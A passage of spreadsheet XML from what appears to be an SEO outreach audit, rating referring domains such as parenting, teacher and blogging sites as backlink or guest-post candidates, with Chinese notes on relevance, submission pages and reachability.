        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q10" s="21" t="str">
        <x:v>Safely share snapshots and videos with loved ones and find new parenting ideas. We Tinybeans&amp;mdash;The Photo-Sharing App That Families Love The App Column Content The App Download the App Tinybeans News &amp; Stories Print a Photo Book Gift a Tinybeans+ subscription Column Image Tinybeans+ Gift Cards The New Parenting Trend on Social Media? Giving Your Kids Privacy Ages &amp; Stages Column Content Ages &amp; Stages Pregnancy Newborn Baby Toddler Kids Tweens &amp; Teens Column Image The Best Way to Avoid a Meltdown When iPad Time Is Over What Kids Can Do Themselves at Every Age Family Life Column Content Family Life Activities for Kids Arts &amp; Crafts Food &amp; Drink Home Organization Parenting Party Ideas Personal Stories Self-Care Column Image 13 Things to Throw Out That You&amp;rsquo;ve Been Des</x:v>
      </x:c>
      <x:c r="R10" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S10" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T10" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://tinybeans.com</x:v>
      </x:c>
    </x:row>
    <x:row r="11">
      <x:c r="A11" s="18" t="str">
        <x:v>10</x:v>
      </x:c>
      <x:c r="B11" s="19" t="str">
        <x:v>samozj.cn</x:v>
      </x:c>
      <x:c r="C11" s="19" t="str">
        <x:v>https://samozj.cn</x:v>
      </x:c>
      <x:c r="D11" s="20" t="str">
        <x:v>15</x:v>
      </x:c>
      <x:c r="E11" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F11" s="20"/>
      <x:c r="G11" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H11" s="19" t="str"/>
      <x:c r="I11" s="19" t="str"/>
      <x:c r="J11" s="19" t="str">
        <x:v>基础设施/搜索/异常域名</x:v>
      </x:c>
      <x:c r="K11" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L11" s="19" t="str">
        <x:v>referrer 噪声</x:v>
      </x:c>
      <x:c r="M11" s="19" t="str">
        <x:v>https://samozj.cn</x:v>
      </x:c>
      <x:c r="N11" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O11" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P11" s="21" t="str">
        <x:v>更像搜索、CDN、文档托管、镜像或异常 referrer，不是可开发的内容外链站点。</x:v>
      </x:c>
      <x:c r="Q11" s="21" t="str"/>
      <x:c r="R11" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S11" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T11" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://samozj.cn
http://samozj.cn</x:v>
      </x:c>
    </x:row>
    <x:row r="12">
      <x:c r="A12" s="18" t="str">
        <x:v>11</x:v>
      </x:c>
      <x:c r="B12" s="19" t="str">
        <x:v>melissaanddoug.com</x:v>
      </x:c>
      <x:c r="C12" s="19" t="str">
        <x:v>https://melissaanddoug.com</x:v>
      </x:c>
      <x:c r="D12" s="20" t="str">
        <x:v>14</x:v>
      </x:c>
      <x:c r="E12" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F12" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G12" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H12" s="19" t="str">
        <x:v>https://www.melissaanddoug.com/</x:v>
      </x:c>
      <x:c r="I12" s="19" t="str"/>
      <x:c r="J12" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K12" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L12" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M12" s="19" t="str">
        <x:v>https://www.melissaanddoug.com/</x:v>
      </x:c>
      <x:c r="N12" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O12" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P12" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q12" s="21" t="str"/>
      <x:c r="R12" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S12" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T12" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://melissaanddoug.com</x:v>
      </x:c>
    </x:row>
    <x:row r="13">
      <x:c r="A13" s="18" t="str">
        <x:v>12</x:v>
      </x:c>
      <x:c r="B13" s="19" t="str">
        <x:v>rightfromthestart.blog</x:v>
      </x:c>
      <x:c r="C13" s="19" t="str">
        <x:v>https://rightfromthestart.blog</x:v>
      </x:c>
      <x:c r="D13" s="20" t="str">
        <x:v>13</x:v>
      </x:c>
      <x:c r="E13" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F13" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G13" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H13" s="19" t="str">
        <x:v>https://rightfromthestart.blog/</x:v>
      </x:c>
      <x:c r="I13" s="19" t="str">
        <x:v>Right from the Start | Play, Early Education and more…</x:v>
      </x:c>
      <x:c r="J13" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K13" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L13" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M13" s="19" t="str">
        <x:v>https://rightfromthestart.blog/</x:v>
      </x:c>
      <x:c r="N13" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O13" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P13" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q13" s="21" t="str">
        <x:v>Play, Early Education and more... Right from the Start | Play, Early Education and more… Right from the Start Search Primary Menu Skip to content Home About Early Education &amp; Play literacy sensory play outdoor play art music education and songs imagination science Maths Special Educational Needs play For Parents Children’s book reviews parenting recipes kids party ideas Expat Seattle Welsh Published Articles Search for: early education &amp; play , social/emotional , songs Engaging Songs to Teach Thumbs Up Choices and Safe Hands March 16, 2025 rightfromthestart Leave a comment My class of 3-5 year old students includes those with disabilities. They have been learning about making thumbs up choices. They are also learning about h</x:v>
      </x:c>
      <x:c r="R13" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S13" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T13" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://rightfromthestart.blog</x:v>
      </x:c>
    </x:row>
    <x:row r="14">
      <x:c r="A14" s="18" t="str">
        <x:v>13</x:v>
      </x:c>
      <x:c r="B14" s="19" t="str">
        <x:v>weareteachers.com</x:v>
      </x:c>
      <x:c r="C14" s="19" t="str">
        <x:v>https://weareteachers.com</x:v>
      </x:c>
      <x:c r="D14" s="20" t="str">
        <x:v>13</x:v>
      </x:c>
      <x:c r="E14" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F14" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G14" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H14" s="19" t="str">
        <x:v>https://www.weareteachers.com/</x:v>
      </x:c>
      <x:c r="I14" s="19" t="str">
        <x:v>We Are Teachers - Ideas and inspiration for reaching the next generation</x:v>
      </x:c>
      <x:c r="J14" s="19" t="str">
        <x:v>教师媒体/教育站</x:v>
      </x:c>
      <x:c r="K14" s="19" t="str">
        <x:v>高</x:v>
      </x:c>
      <x:c r="L14" s="19" t="str">
        <x:v>投稿 pitch/full post</x:v>
      </x:c>
      <x:c r="M14" s="19" t="str">
        <x:v>https://www.weareteachers.com/write-for-weareteachers/</x:v>
      </x:c>
      <x:c r="N14" s="19" t="str">
        <x:v>可做</x:v>
      </x:c>
      <x:c r="O14" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P14" s="21" t="str">
        <x:v>有现行投稿表单，接受教育和教师生活类 pitch/full post；竞争高，是否保留外链由编辑决定。</x:v>
      </x:c>
      <x:c r="Q14" s="21" t="str">
        <x:v>We Are Teachers is a proud community of educators, sharing ideas, resources, and awesome freebies and giveaways. We Are Teachers - Ideas and inspiration for reaching the next generation Skip to main content Close Open Toggle menu Choose my view: All Grades K-5 Grades 6-12 School Leaders Search for: Grades Grades All Grades K-5 All Grades 6-12 PreK 6th Grade Kindergarten 7th Grade 1st Grade 8th Grade 2nd Grade 9th Grade 3rd Grade 10th Grade 4th Grade 11th Grade 5th Grade 12th Grade Topic Topics Reading Classroom Management ESL/ELL Ask We Are Teachers Math Education News &amp; Research Art &amp; Creativity PD We Love Science Diversity &amp; Inclusion Social Studies Teacher Pay &amp; Advocacy Technology Work/Life Balance World Languages Classroom Setup &amp; Supplies Assessment Back to School Creative Classroom Earth Day Edu</x:v>
      </x:c>
      <x:c r="R14" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S14" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T14" s="21" t="str">
        <x:v>优先投数学、科学或 STEAM 课堂文章。 | 请求: https://weareteachers.com</x:v>
      </x:c>
    </x:row>
    <x:row r="15">
      <x:c r="A15" s="18" t="str">
        <x:v>14</x:v>
      </x:c>
      <x:c r="B15" s="19" t="str">
        <x:v>glowscotland.org.uk</x:v>
      </x:c>
      <x:c r="C15" s="19" t="str">
        <x:v>https://glowscotland.org.uk</x:v>
      </x:c>
      <x:c r="D15" s="20" t="str">
        <x:v>13</x:v>
      </x:c>
      <x:c r="E15" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F15" s="20"/>
      <x:c r="G15" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H15" s="19" t="str"/>
      <x:c r="I15" s="19" t="str"/>
      <x:c r="J15" s="19" t="str">
        <x:v>教育机构/资源导航</x:v>
      </x:c>
      <x:c r="K15" s="19" t="str">
        <x:v>高</x:v>
      </x:c>
      <x:c r="L15" s="19" t="str">
        <x:v>资源建议说明</x:v>
      </x:c>
      <x:c r="M15" s="19" t="str">
        <x:v>https://blogs.glowscotland.org.uk/glowblogs/nationalelearning/suggestions/</x:v>
      </x:c>
      <x:c r="N15" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O15" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P15" s="21" t="str">
        <x:v>官方 STEM 说明页提到可建议有用的科学教育资源；当前建议页面需要人工确认是否仍开放。</x:v>
      </x:c>
      <x:c r="Q15" s="21" t="str"/>
      <x:c r="R15" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S15" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T15" s="21" t="str">
        <x:v>fetch failed | 需要准备年级、课程目标、教学用法和直接资源链接。 | 请求: https://glowscotland.org.uk
http://glowscotland.org.uk</x:v>
      </x:c>
    </x:row>
    <x:row r="16">
      <x:c r="A16" s="18" t="str">
        <x:v>15</x:v>
      </x:c>
      <x:c r="B16" s="19" t="str">
        <x:v>wordpress.com</x:v>
      </x:c>
      <x:c r="C16" s="19" t="str">
        <x:v>https://wordpress.com</x:v>
      </x:c>
      <x:c r="D16" s="20" t="str">
        <x:v>12</x:v>
      </x:c>
      <x:c r="E16" s="20" t="str">
        <x:v>10</x:v>
      </x:c>
      <x:c r="F16" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G16" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H16" s="19" t="str">
        <x:v>https://wordpress.com/ja/</x:v>
      </x:c>
      <x:c r="I16" s="19" t="str">
        <x:v>WordPress.com: サイト構築に必要なすべてが揃っています</x:v>
      </x:c>
      <x:c r="J16" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K16" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L16" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M16" s="19" t="str">
        <x:v>https://wordpress.com/ja/</x:v>
      </x:c>
      <x:c r="N16" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O16" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P16" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q16" s="21" t="str">
        <x:v>組み込み型のホスティングサービス、プレミアムテーマ、強力なツールで WordPress サイトを作成しましょう。 技術的なセットアップは必要ありません。 今すぐ構築を開始しましょう。無料プランをご利用いただけます。 WordPress.com: サイト構築に必要なすべてが揃っています 商品 リソース サポート 価格 ログイン 始めてみよう メニュー 構築 サイト eコマース AI サイトビルダー 公開 ブログ ニュースレター ホスティング マネージドホスティング エージェンシーホスティング サイトの移行 ドメイン ドメインを探す ドメインを移管する メール ビジネス用メールアドレス アフィリエイト アフィリエイトプログラム エンタープライズ エンタープライズホスティング ツールとサービス 会社名ジェネレータ ロゴ生成機能 速度テスト エキスパートに依頼する サイトプロファイラー (WHOIS) Newspack 開発者向け 開発者ツール 開発者ブログ REST API ドキュメント スタジオ 機能 テーマ プラグイン パターン AI 機能 すべて表示 ディスカバー 最新ニュース ブログを閲覧 戻る 商品 リソース サポート 価格 構築 サイト eコマース AI サイトビルダー 公開 ブログ ニュースレター ホスティング マネージドホスティング エージェンシーホスティング サイトの移行 ドメイン ドメインを探す ドメインを移管する メール ビジネス用メールアドレス アフィリエイト アフィリエイトプログラム エンタープライズ エンタープライズホスティング ツールとサービス 会社名ジェネレータ ロゴ生成機能 速度テスト エキスパートに依頼する サイトプロファイラー (WHOIS) Newspack 開発者向け 開発者ツール 開発者ブログ REST API ドキュメント スタジオ 機能 テーマ プ</x:v>
      </x:c>
      <x:c r="R16" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S16" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T16" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://wordpress.com</x:v>
      </x:c>
    </x:row>
    <x:row r="17">
      <x:c r="A17" s="18" t="str">
        <x:v>16</x:v>
      </x:c>
      <x:c r="B17" s="19" t="str">
        <x:v>monspetits.com</x:v>
      </x:c>
      <x:c r="C17" s="19" t="str">
        <x:v>https://monspetits.com</x:v>
      </x:c>
      <x:c r="D17" s="20" t="str">
        <x:v>11</x:v>
      </x:c>
      <x:c r="E17" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F17" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G17" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H17" s="19" t="str">
        <x:v>https://monspetits.com/</x:v>
      </x:c>
      <x:c r="I17" s="19" t="str">
        <x:v>MonsPetits – Blog de Maternidad y Educación | Mamá bloguera | Imprimibles Educativos</x:v>
      </x:c>
      <x:c r="J17" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K17" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L17" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M17" s="19" t="str">
        <x:v>https://monspetits.com/</x:v>
      </x:c>
      <x:c r="N17" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O17" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P17" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q17" s="21" t="str">
        <x:v>MonsPetits – Blog de Maternidad y Educación | Mamá bloguera | Imprimibles Educativos Inicio ¿Quién soy? Política Compras y Privacidad Imprimibles Gratis Tienda Imprimibles MonsPetits | Maternidad | Educación | Imprimibles Imprimibles Educativos Imprimibles Gratuitos Tienda de Imprimibles Imprimibles Educativos Lectoescritura Infantil Carteles y tarjetas del abecedario para aprender a trazar las letras + imprimible GRATIS Lou 21 de agosto de 2026 Carteles y tarjetas del abecedario para aprender a trazar las letras + imprimible educativo Aprender a escribir no consiste únicamente en reconocer la forma de&amp;hellip; Leer más Imprimibles Educativos Imprimibles Gratuitos Verano / Summer Cómo seguir </x:v>
      </x:c>
      <x:c r="R17" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S17" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T17" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://monspetits.com</x:v>
      </x:c>
    </x:row>
    <x:row r="18">
      <x:c r="A18" s="18" t="str">
        <x:v>17</x:v>
      </x:c>
      <x:c r="B18" s="19" t="str">
        <x:v>schaefferhomes.com</x:v>
      </x:c>
      <x:c r="C18" s="19" t="str">
        <x:v>https://schaefferhomes.com</x:v>
      </x:c>
      <x:c r="D18" s="20" t="str">
        <x:v>11</x:v>
      </x:c>
      <x:c r="E18" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F18" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G18" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H18" s="19" t="str">
        <x:v>https://www.schaefferhomes.com/</x:v>
      </x:c>
      <x:c r="I18" s="19" t="str"/>
      <x:c r="J18" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K18" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L18" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M18" s="19" t="str">
        <x:v>https://www.schaefferhomes.com/</x:v>
      </x:c>
      <x:c r="N18" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O18" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P18" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q18" s="21" t="str"/>
      <x:c r="R18" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S18" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T18" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://schaefferhomes.com</x:v>
      </x:c>
    </x:row>
    <x:row r="19">
      <x:c r="A19" s="18" t="str">
        <x:v>18</x:v>
      </x:c>
      <x:c r="B19" s="19" t="str">
        <x:v>teachinglittles.com</x:v>
      </x:c>
      <x:c r="C19" s="19" t="str">
        <x:v>https://teachinglittles.com</x:v>
      </x:c>
      <x:c r="D19" s="20" t="str">
        <x:v>11</x:v>
      </x:c>
      <x:c r="E19" s="20" t="str">
        <x:v>6</x:v>
      </x:c>
      <x:c r="F19" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G19" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H19" s="19" t="str">
        <x:v>https://www.teachinglittles.com/</x:v>
      </x:c>
      <x:c r="I19" s="19" t="str">
        <x:v>Teaching Littles - Little By Little, Our Littles Learn A Lot</x:v>
      </x:c>
      <x:c r="J19" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K19" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L19" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M19" s="19" t="str">
        <x:v>https://www.teachinglittles.com/</x:v>
      </x:c>
      <x:c r="N19" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O19" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P19" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q19" s="21" t="str">
        <x:v>Little By Little, Our Littles Learn A Lot Teaching Littles - Little By Little, Our Littles Learn A Lot Baby Fine Motor Gross Motor Learning Sensory Toddler Fine Motor Gross Motor Language Learning Sensory Skills Fine Motor Gross Motor Language Learning Sensory Teaching Preschool Homeschool Kindergarten Themes Seasonal Spring Easter Summer Fall Winter Valentine’s Day St Patricks Day Holiday Hanukkah Shop Fine Motor Activities for 9-12 Month Olds 9 Ways to Teach Your Baby to Crawl 20 Things to Teach Your Two-Year-Old Color Matching and Sorting for Toddlers Teaching Kids About Gardening: Early Learning Through a Family Garden A backyard garden is one of the richest classrooms a young child can have. Between digging in the dirt, watchin</x:v>
      </x:c>
      <x:c r="R19" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S19" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T19" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://teachinglittles.com</x:v>
      </x:c>
    </x:row>
    <x:row r="20">
      <x:c r="A20" s="18" t="str">
        <x:v>19</x:v>
      </x:c>
      <x:c r="B20" s="19" t="str">
        <x:v>parentmap.com</x:v>
      </x:c>
      <x:c r="C20" s="19" t="str">
        <x:v>https://parentmap.com</x:v>
      </x:c>
      <x:c r="D20" s="20" t="str">
        <x:v>10</x:v>
      </x:c>
      <x:c r="E20" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F20" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G20" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H20" s="19" t="str">
        <x:v>https://www.parentmap.com/</x:v>
      </x:c>
      <x:c r="I20" s="19" t="str">
        <x:v>Family Activities + Advice for Greater Seattle Parents | ParentMap</x:v>
      </x:c>
      <x:c r="J20" s="19" t="str">
        <x:v>亲子媒体</x:v>
      </x:c>
      <x:c r="K20" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L20" s="19" t="str">
        <x:v>编辑投稿</x:v>
      </x:c>
      <x:c r="M20" s="19" t="str">
        <x:v>https://www.parentmap.com/editorial-submissions/</x:v>
      </x:c>
      <x:c r="N20" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O20" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P20" s="21" t="str">
        <x:v>有现行 freelance pitch 入口，接受家庭教育和育儿主题；需要强文章角度，外链不保证。</x:v>
      </x:c>
      <x:c r="Q20" s="21" t="str">
        <x:v>Your guide to parenting and family fun in Greater Seattle. Find expert advice, local events, family activities and resources for kids in Seattle, Bellevue, Tacoma and across the Puget Sound region. Family Activities + Advice for Greater Seattle Parents | ParentMap Search Seattle Family Calendar Subscribe The Latest Subscribe Search Things to Do Indoor Fun Outdoor Activities Travel + Getaways Arts + Eats Raising Kids Child Development Managing Behavior Technology Neurodivergent Kids New Parents Home + Life Recipes + Meal Planning Seasonal + Celebrations Shopping Entertainment Family Wellness Kids’ Health Parent Well-Being Relationships + Marriage Education Early Learning K–12 Education Camps + Classes ParentMap Talks Seattle Family Calendar Parentmap Talks ’cause parenting is a trip! Facebook Instagram TikTok Pinterest LinkedIn X Things to Do Indoor Fun Outdoor Activities Travel + Getaw</x:v>
      </x:c>
      <x:c r="R20" s="19" t="str">
        <x:v>重点站点人工核验</x:v>
      </x:c>
      <x:c r="S20" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T20" s="21" t="str">
        <x:v>更适合西雅图/家庭场景或亲子科学活动，而不是产品广告。 | 请求: https://parentmap.com</x:v>
      </x:c>
    </x:row>
    <x:row r="21">
      <x:c r="A21" s="18" t="str">
        <x:v>20</x:v>
      </x:c>
      <x:c r="B21" s="19" t="str">
        <x:v>in8818.com</x:v>
      </x:c>
      <x:c r="C21" s="19" t="str">
        <x:v>https://in8818.com</x:v>
      </x:c>
      <x:c r="D21" s="20" t="str">
        <x:v>10</x:v>
      </x:c>
      <x:c r="E21" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F21" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G21" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H21" s="19" t="str">
        <x:v>https://in8818.com/</x:v>
      </x:c>
      <x:c r="I21" s="19" t="str">
        <x:v>Home - Simple</x:v>
      </x:c>
      <x:c r="J21" s="19" t="str">
        <x:v>基础设施/搜索/异常域名</x:v>
      </x:c>
      <x:c r="K21" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L21" s="19" t="str">
        <x:v>referrer 噪声</x:v>
      </x:c>
      <x:c r="M21" s="19" t="str">
        <x:v>https://in8818.com/</x:v>
      </x:c>
      <x:c r="N21" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O21" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P21" s="21" t="str">
        <x:v>更像搜索、CDN、文档托管、镜像或异常 referrer，不是可开发的内容外链站点。</x:v>
      </x:c>
      <x:c r="Q21" s="21" t="str">
        <x:v>Page description Home - Simple Login Register The website builder you're looking for Simple is a modern website builder powered by AI that changes how companies create user interfaces together. Start Free Trial -&gt; Learn More cruip.com npm login --registry=https://npm.pkg.github.com --scope=@phanatic Successfully logged-in. npm publish Package published. Simple helps your teams work more efficiently together Instant Analytics Collect essential insights about how visitors are using your site with in-depth page view metrics like pages, referring sites, and more. Metadata Collect essential insights about how visitors are using your site with in-depth page view metrics like pages, referring sites, and more. SEO &amp;</x:v>
      </x:c>
      <x:c r="R21" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S21" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T21" s="21" t="str">
        <x:v>请求: https://in8818.com</x:v>
      </x:c>
    </x:row>
    <x:row r="22">
      <x:c r="A22" s="18" t="str">
        <x:v>21</x:v>
      </x:c>
      <x:c r="B22" s="19" t="str">
        <x:v>esvpnapp.com</x:v>
      </x:c>
      <x:c r="C22" s="19" t="str">
        <x:v>https://esvpnapp.com</x:v>
      </x:c>
      <x:c r="D22" s="20" t="str">
        <x:v>10</x:v>
      </x:c>
      <x:c r="E22" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F22" s="20"/>
      <x:c r="G22" s="19" t="str">
        <x:v>超时</x:v>
      </x:c>
      <x:c r="H22" s="19" t="str"/>
      <x:c r="I22" s="19" t="str"/>
      <x:c r="J22" s="19" t="str">
        <x:v>基础设施/搜索/异常域名</x:v>
      </x:c>
      <x:c r="K22" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L22" s="19" t="str">
        <x:v>referrer 噪声</x:v>
      </x:c>
      <x:c r="M22" s="19" t="str">
        <x:v>https://esvpnapp.com</x:v>
      </x:c>
      <x:c r="N22" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O22" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P22" s="21" t="str">
        <x:v>更像搜索、CDN、文档托管、镜像或异常 referrer，不是可开发的内容外链站点。</x:v>
      </x:c>
      <x:c r="Q22" s="21" t="str"/>
      <x:c r="R22" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S22" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T22" s="21" t="str">
        <x:v>timeout | timeout | 请求: https://esvpnapp.com
http://esvpnapp.com</x:v>
      </x:c>
    </x:row>
    <x:row r="23">
      <x:c r="A23" s="18" t="str">
        <x:v>22</x:v>
      </x:c>
      <x:c r="B23" s="19" t="str">
        <x:v>bloglovin.com</x:v>
      </x:c>
      <x:c r="C23" s="19" t="str">
        <x:v>https://bloglovin.com</x:v>
      </x:c>
      <x:c r="D23" s="20" t="str">
        <x:v>9</x:v>
      </x:c>
      <x:c r="E23" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F23" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G23" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H23" s="19" t="str">
        <x:v>https://bloglovin.com/</x:v>
      </x:c>
      <x:c r="I23" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J23" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K23" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L23" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M23" s="19" t="str">
        <x:v>https://bloglovin.com/</x:v>
      </x:c>
      <x:c r="N23" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O23" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P23" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
